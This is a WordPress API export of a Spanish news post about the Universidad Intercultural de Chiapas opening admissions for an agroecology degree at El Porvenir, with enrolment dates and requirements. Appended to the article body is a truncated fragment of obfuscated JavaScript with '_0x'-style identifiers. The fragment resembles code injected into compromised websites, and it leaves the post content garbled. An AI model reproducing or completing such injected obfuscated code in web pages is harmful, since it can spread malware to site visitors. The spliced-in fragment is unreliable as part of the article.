{"id":3437,"date":"2022-07-05T01:21:03","date_gmt":"2022-07-05T01:21:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3437"},"modified":"2022-07-05T01:21:03","modified_gmt":"2022-07-05T01:21:03","slug":"emite-unich-convocatoria-para-la-licenciatura-en-agroecologia-con-sede-en-el-porvenir","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3437","title":{"rendered":"Emite UNICH convocatoria para la licenciatura en Agroecolog\u00eda con sede en El porvenir"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"799\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-04-at-3.35.40-PM-1024x799.jpeg\" alt=\"\" class=\"wp-image-3438\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-04-at-3.35.40-PM-1024x799.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-04-at-3.35.40-PM-300x234.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-04-at-3.35.40-PM-768x599.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-04-at-3.35.40-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; La Universidad Intercultural de Chiapas (UNICH), dio a conocer que ha emitido ya la convocatoria para la licenciatura en Agroecolog\u00eda, en la Unidad acad\u00e9mica de adscripci\u00f3n, Unidad Intercultural Multimodal \u201cEl Porvenir\u201d en su Modalidad Mixta, Modelo Educativo, Intercultural Cr\u00edtico, con una duraci\u00f3n de 8 semestres, el cual iniciar\u00e1 el pr\u00f3ximo 22 de agosto de 2022. Esta licenciatura tiene como misi\u00f3n, formar profesionales con conocimientos, capacidades y actitudes necesarias para acompa\u00f1ar y generar procesos colectivos que garanticen la gesti\u00f3n y manejo de sistemas agroecol\u00f3gicos y la soberan\u00eda alimentaria en sus dimensiones geogr\u00e1fica, sociocultural, pedag\u00f3gica, pol\u00edtica, ecol\u00f3gica, productiva y econ\u00f3mica que contribuyan al cambio social ambiental. La Licenciatura en Agroecolog\u00eda, es un programa educativo reconocido y acreditado por la comprobada calidad de su planta docente, investigaci\u00f3n vinculada y transferencia de tecnolog\u00eda, dise\u00f1ado para formar profesionales con capacidades y liderazgo para impulsar la gesti\u00f3n y desarrollo de agroecosistemas que contribuyen al desarrollo sostenible en los niveles comunitario y regional. De acuerdo a la convocatoria emitida, esta licenciatura busca formar profesionistas con la capacidad de gestionar sistemas agroecol\u00f3gicos que contribuyan al bienestar social y a la preservaci\u00f3n del patrimonio biocultural en los territorios y que tengan la capacidad para producir alimentos sanos, diversos y suficientes, con base en el di\u00e1logo de saberes y la vinculaci\u00f3n comunitaria, garantizando los principios de sustentabilidad, soberan\u00eda alimentaria y justicia social. Los aspirantes deben presentar de manera variable conocimientos b\u00e1sicos obtenidos en preparatoria e inter\u00e9s en temas como: biolog\u00eda, qu\u00edmica, f\u00edsica, pensamiento cr\u00edtico, procesos socio hist\u00f3ricos, conocimientos agropecuarios, adem\u00e1s de mostrar preferencia por temas asociados a la conservaci\u00f3n del ambiente, por actividades relacionadas con campesinos, conciencia \u201cecol\u00f3gica&#8221;, compromiso social, movimientos sociales. Adem\u00e1s de tener una actitud para trabajar en campo, con una perspectiva intercultural y de respeto a la diversidad. Habilidades para el manejo de tecnolog\u00edas agr\u00edcolas y de comunicaci\u00f3n intercultural. Compromiso social con su comunidad de origen\u201d. Los interesados pueden realizarlo  del 8 al 17 de agosto de 2022, a trav\u00e9s del Sistema de Informaci\u00f3n Universitaria (SIUN) en la liga https:\/\/siun.unich.edu.mx\/ y deber\u00e1n acudir el 18 y 19 de agosto, realizar un pago de inscripci\u00f3n en la unidad en el municipio \u201cEl Porvenir\u201d en horario de 10:00 a 14:00 horas y  de 16:00 a 20:00 horas, de requerir mas informaci\u00f3n, consultar la pagina www.unich.edu.mx donde se encuentra la convocatoria, o al tel\u00e9fono 967 165 40 97 en d\u00edas h\u00e1biles.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas. &#8211; La Universidad Intercultural de Chiapas (UNICH), dio a conocer que ha emitido ya la convocatoria para la licenciatura en Agroecolog\u00eda, en la Unidad acad\u00e9mica de adscripci\u00f3n, Unidad Intercultural Multimodal \u201cEl Porvenir\u201d en su Modalidad Mixta, Modelo Educativo, Intercultural Cr\u00edtico, con una duraci\u00f3n de 8 semestres, el cual &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3438,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3437","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3437","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3437"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3437\/revisions"}],"predecessor-version":[{"id":3439,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3437\/revisions\/3439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3438"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3437"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3437"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3437"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}